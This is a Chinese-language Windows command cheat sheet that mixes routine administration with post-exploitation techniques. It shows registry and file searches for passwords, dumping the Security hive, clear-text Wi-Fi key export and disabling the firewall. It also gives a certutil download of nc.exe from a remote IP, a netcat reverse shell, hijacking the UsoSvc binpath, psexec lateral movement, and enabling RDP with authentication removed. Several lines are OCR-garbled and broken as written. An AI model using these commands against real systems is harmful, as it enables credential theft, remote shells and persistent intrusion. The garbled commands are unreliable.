Windows命令

系统信息命令

命令 解释
ver
查看操作系统版本
sc query state=all
列出服务
tasklist /svc
列出进程和服务
tasklist /m
列出所有进程和dll
tasklist /S IP /v
显示指定IP地址的进程
taskkill /PID pid /F
强制杀死进程
systeminfo /S IP /U domain\user /P Pwd
显示指定IP地址的详细信息
reg query \ IP \ RegDomain \ Key /v VALUE
查询注册表所有值
reg query HKLM /f password /t REG_SZ /s
查询注册表中的密码值
reg query
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
/v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
查询注册表中的WSUS服务器的 HTTP URL值
fsutil fsinfo drives
列出电脑中的所有驱动器(需要管理员权限)
dir /a /s /b c:'.pdf’
查询所有PDF文件
dir /a /b c:\windows\kb’
列出所有系统补丁
findstr /si password’ .txt I •.xmll •.xls
查询带有密码的txt、xml、xls文件
tree /F /A c: tree.txt
以文本字符的形式显示C盘的结构,并保存到tree.txt文件中
reg save HKLM\Security security.hive
将注册表中的子键保存为security.hive文件
%USERNAME%
输出当前用户名
whoami /priv
列出当前权限

网络命令

命令 解释
ipconfig I all
查看IP设置
ipconfig /displaydns
查看DNS缓存
netstat -ana
查看连接
netstat -anop tcp 1
显示当前活动的TCP连接
netstat -ani findstr LISTENING
显示当前活动的TCP连接,并只显示处于LISTENING状态的连接
route print
路由表
arp -a
显示当前计算机的ARP缓存表
nslookup, set type=any, ls -d domain results.txt, exit
查询一个域名的所有DNS记录,并将结果保存到results.txt文件中
nslookup -type=SRV _www._tcp.url.com
查询一个URL的SRV记录,也就是指定了提供某种服务的服务器的位置和端口的DNS记录
tftp -I IP GET boot.img
使用tftp工具从指定的IP地址的TFTP服务器上下载文件名为boot.img的文件
netsh wlan show profiles
显示系统保存的所有连接过的无线网络配置文件
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
使用netsh关闭防火墙
netsh wlan export profile folder=. key=clear
使用netsh工具将系统中保存的所有无线网络配置文件导出为XML文件,并保存在当前目录下
netsh interface IP show interfaces
使用netsh工具显示电脑中的所有IP接口的信息
netsh interface IP set address local static ip nmask gw ID
使用netsh工具来为本地计算机的网络接口设置一个静态的IP地址、子网掩码和默认网关
netsh interface IP set dns local static ip
使用netsh工具配置本地计算机的DNS
netsh interface ip set address local dhcp
使用netsh工具来为本地计算机的网络接口设置一个动态的IP地址,也就是从DHCP服务器上自动获取IP地址、子网掩码和默认网关。

功能命令

命令 解释
type FILE
显示文件内容
del path \' .• /a /s /q /f
删除当前路径下的文件
find /I ''str'' FILENAME command I find /c /v ""
使用find工具来统计一个文件中不包含指定字符串的行数
at HH:MM
定时执行
runas /user: user " file [args]"
使用特殊用户执行文件
restart /r /t 0
重启系统
sc start UsoSvc
sc stop UsoSvc
开启/关闭UsoSvc服务
sc config UsoSvc binpath="c:\windows\temp\nc.exe IP PORT -e C:\windows\system32\cmd.exe"
使用sc工具修改UsoSvc服务的二进制路径,也就是该服务运行时要执行的文件
makecab FILE
将一个或多个文件压缩成.cab文件
Wusa.exe /uninstall /kb: 编号
卸载Windows更新程序
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
从应用程序事件日志中查询最近的40个事件,并以文本格式显示
lusrrngr.msc
使用本地用户管理
services.msc
打开服务管理面板
taskmgr.exe
打开任务管理器
secpol.msc
打开本地安全策略控制台
eventvwr.msc
打开事件查看器

远程命令

命令 解释
tasklist /S IP /v
显示远程计算机IP上运行的所有进程的详细信息
systeminfo /S IP /U domain\user /P Pwd
显示远程计算机ip上的系统配置信息
net share \\ IP
显示远程计算机IP上共享的所有资源的信息
net use \\ IP
显示或连接到远程计算机IP上的共享资源或网络打印机
net use e: \\ IP \share password /user: DOMAIN user
将远程计算机IP上的共享资源share映射为本地驱动器e,并指定连接到该资源所需的域名,用户名和密码
reg add \\ IP \ regkey \ value
在远程计算机IP上的注册表中添加一个新的子键或条目
sc \\ IP create service binpath=C:\Windows\System32\x.exe start=auto
在远程计算机ip上创建一个新的服务,并指定该服务的二进制文件路径和启动类型
cmd.exe /c certutil -urlcache -split -f http://IP/nc.exe c:/windows/temp/nc.exe
从http://IP/nc.exe下载一个文件并保存到c:/windows/temp/nc.exe
cmd.exe /c c:/windows/temp/nc.exe IP PORT -e cmd.exe
在命令提示符下执行c:/windows/temp/nc.exe文件,并将其连接到远程主机ip的端口port,并在该主机上执行cmd.exe
nc.exe -lvvp PORT
监听本地主机上的端口PORT,并等待来自其他主机的连接
python3 -m http.server PORT
使用Python3启动一个简单的HTTP服务器,并在本地主机上的端口PORT上提供服务
xcopy /s \\ IP \dir E:\local\
复制远程计算机IP上的目录dir及其子目录下的所有文件到本地目录E:\local\
shutdown /m \\ IP /r /t 0 /f
强制重启远程计算机IP,并立即执行该操作

杂项命令

rundll32.dll user32.dll LockWorkstation
# 锁定当前用户的工作站
netsh interface portproxy add v4tov4 listenport=PORT1 listenaddress=IP1 connectport=PORT2 connectaddress=IP2
# 创建端口转发
netsh interface portproxy delete v4tov4 listenport=PORT1 listenaddress=IP1
# 移除端口转发
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f
# 在当前用户的注册表中添加一个禁用云剪贴板的策略
psexec /accepteula \\ targetIP -u domain\user -p password -c -f \\ smbIP \share\file.exe
# 用于将 file.exe 文件从 smbIP 的 share 共享目录复制并在 targetIP 的远程系统上执行,使用 domain\user 的用户名和 password 的密码进行身份验证
psexec /accepteula \\ IP -u Domain\user -p Lt1 c:\Program-1
# 用于在 IP 的远程系统上执行 c:\Program-1 文件,使用 Domain\user 的用户名和 Lt1 的密码进行身份验证
psexec /accepteula \\ IP -s cmd.exe
# 用于在 IP 的远程系统上以 System 权限运行 cmd.exe,打开一个命令提示符窗口
# 启动RDP服务
Create regfile.reg file with following line in it: HKEY LOCAL MACHINE\SYSTEH\CurrentControlSet \Control\ Terminal Server "fDenyTSCo~nections"=dword: 00000000
reg import regfile.reg 
net start ''terrnservice'' 
sc config terrnservice start= auto 
net start terrnservice 

# 注册表启动RDP服务
reg add "HKEY LOCAL MACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# 来自端口 443 的 RDP 隧道(需要重新启动终端)
REG ADD "HKLM\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f 

# 通过在防火墙中添加例外来删除RDP服务的网络身份验证
reg add "HKEY LOCAL MACHINE\SYSTEM\CurentControlSet\Control \Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f 
netsh firewall set service type = remotedesktop mode = enable 
schtasks.exe /create /tn MyTask /xml "E:\MyTask.xml" /f
# 从XML文件导入到计划任务